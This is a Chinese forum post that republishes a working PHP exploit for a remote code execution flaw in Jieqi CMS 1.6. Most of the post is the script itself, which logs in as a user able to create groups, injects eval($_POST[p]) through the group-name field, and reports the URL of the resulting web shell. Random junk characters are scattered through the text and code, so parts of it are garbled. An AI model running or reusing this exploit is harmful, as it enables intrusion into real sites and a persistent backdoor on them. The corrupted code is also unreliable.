杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。) B. e& k" j0 k' H; a+ ^' l
- |, F/ v, Y1 O) H0 g9 \1 @' | H* {8 B L3 D" \/ v! g) T( V
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
+ L+ D1 |1 H7 ]4 V" N' s 需要有一个能创建圈子的用户。
! x. C. H/ y7 K i1 k* F ( i0 P3 v0 ]' H. \/ m8 @
<?php
1 T+ X2 e1 T. X4 d ~/ B# y- F 9 ^' A. H3 n! v Y4 [5 h5 ?( H
print_r('
, Y& K& t" V! p3 K& O+---------------------------------------------------------------------------+
, A: b& U, I1 y" W1 FJieqi CMS V1.6 PHP Code Injection Exploit" @) z; \: u$ b5 T! z
by flyh4t
! s1 T' W( G3 u0 R. Smail: phpsec at hotmail dot com/ d t; p" Z N* A0 `
team: http://www.wolvez.org% {. G6 J1 G+ y, X- k
+---------------------------------------------------------------------------+* Z3 z+ s" J# [! [
'); /**
5 |3 W/ {1 ~6 e2 q; M * works regardless of php.ini settings
% R" L ^/ a! w n3 H4 z*/ if ($argc < 5) { print_r('* N! |$ @2 }& z' J" [. B; p2 [6 q( o- [
+---------------------------------------------------------------------------+
7 }# C# L' n) A" y6 z, ^* S/ aUsage: php '.$argv[0].' host path username# e; n4 e) m7 d5 D; v$ {8 g1 ~ x& H
host: target server (ip/hostname)+ C* U, }& P" [/ D" o$ @; a" \4 Y
path: path to jieqicms
/ a( l4 U X" _9 `: V. S Q! I- Xuasename: a username who can create group
$ S/ Z, V" I) y: \% Q9 V) QExample:- |2 w9 [- g! U% ^
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password: ^5 w8 k! f* L2 _
+---------------------------------------------------------------------------+
9 _7 e6 R2 k! ?; X4 S+ L'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
$ _4 j6 a$ f5 k0 V# s XContent-Disposition: form-data; name="gname"' P% A8 Y+ I' \% D Z2 F
. X! D; T: ~7 U3 |- t'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
) X7 H7 G8 O" J( r% W" I-----------------------------23281168279961+ D8 A/ O- s/ p7 k
Content-Disposition: form-data; name="gcatid"
9 q' g/ C/ }: J! a; E3 d
! E( Y2 c+ F m) j+ b8 \& H1. m" H* i: k, `
-----------------------------232811682799617 M7 {6 O. k4 `
Content-Disposition: form-data; name="gaudit"/ y5 J) V% _/ U& C, e
6 a) a5 U& Z. T& d
1
) A, u: ]6 B' T3 D0 o7 K4 e-----------------------------23281168279961
0 K/ _; ?1 U+ ?0 q( SContent-Disposition: form-data; name="gbrief" t" m: V* ]+ `. G" o- x, r$ s/ _
9 e/ H+ u$ x. s: q( ]
1
& S/ F/ A$ r: T. y* N$ n-----------------------------23281168279961--
2 @8 L* n* @- j/ M2 X% E5 I: `8 X'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com, t) Z% P- _+ r9 |1 L, }( M q
2 o$ a4 D' z% x+ I; r& n2 s+ _preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对